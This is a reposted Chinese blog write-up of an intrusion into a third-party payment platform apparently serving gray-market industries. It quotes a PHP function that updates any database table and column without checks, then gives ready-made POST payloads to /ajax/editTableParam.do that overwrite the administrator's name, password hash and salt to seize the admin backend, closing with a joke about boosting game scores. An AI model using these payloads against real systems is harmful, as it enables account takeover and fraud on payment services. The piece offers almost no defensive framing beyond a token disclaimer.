记一次某三方支付平台渗透-任意文件读取后获得后台

   日期:2020-09-06     浏览:98    评论:0    
核心提示:记一次某平台渗透-任意文件读取后获得后台项目:提示:这是一个某支付平台的源码例如:项目场景:改平台用于对接一些特殊行业,你懂的,总他的源码可以看出下面的问题问题描述:提示:明显有一个修改库信息的的地方,并且没有过滤下面是源码: public function editTableParam() { $table = input(post.table); $param = input(post.param);

记一次某三方支付平台渗透-任意文件读取后获得后台

如果有志同道合的技术朋友可以加我QQ:2849084774。

项目:

提示:这是一个某支付平台的源码
例如:项目场景:该平台用于对接一些特殊行业,你懂的,总他的源码可以看出下面的问题

问题描述:

提示:明显有一个修改库信息的的地方,并且没有过滤
下面是源码:

    public function editTableParam()
    {

        $table      = input('post.table'); 
        $param      = input('post.param'); 
        $value      = input('post.value'); 
        $id         = input('post.id', 'id'); 
        $idValue    = input('post.idValue'); 
        return Db::name($table)->where([$id => $idValue])->update([$param => $value]);
    }

于是写下payload:

根据自己搭建数据库的表明得知它的密码是通过盐值来加密,因此自己生成一个盐值、

/ajax/editTableParam.do

payload="table=admin&param=name&value=ceshi001&idValue=1"
table=admin&param=passwd&value=a91545d4ecf70aaa68acbe3e13792777&&idValue=1
table=admin&param=passwd_salt&value=2xh2J3HYDITwZqv4AyGx&idValue=1
    }

注入成功:然后直接在后台登陆你的账号密码即可

请勿用于非法用途
得到后台管理员权限,那就可以给心爱的游戏直接上分啦,效果你懂得!!!

这种源码发现了好几个漏洞,没想到啊

 
打赏
 本文转载自:网络 
所有权利归属于原作者,如文章来源标示错误或侵犯了您的权利请联系微信13520258486
更多>最近资讯中心
更多>最新资讯中心
0相关评论

推荐图文
推荐资讯中心
点击排行
最新信息
新手指南
采购商服务
供应商服务
交易安全
关注我们
手机网站:
新浪微博:
微信关注:

13520258486

周一至周五 9:00-18:00
(其他时间联系在线客服)

24小时在线客服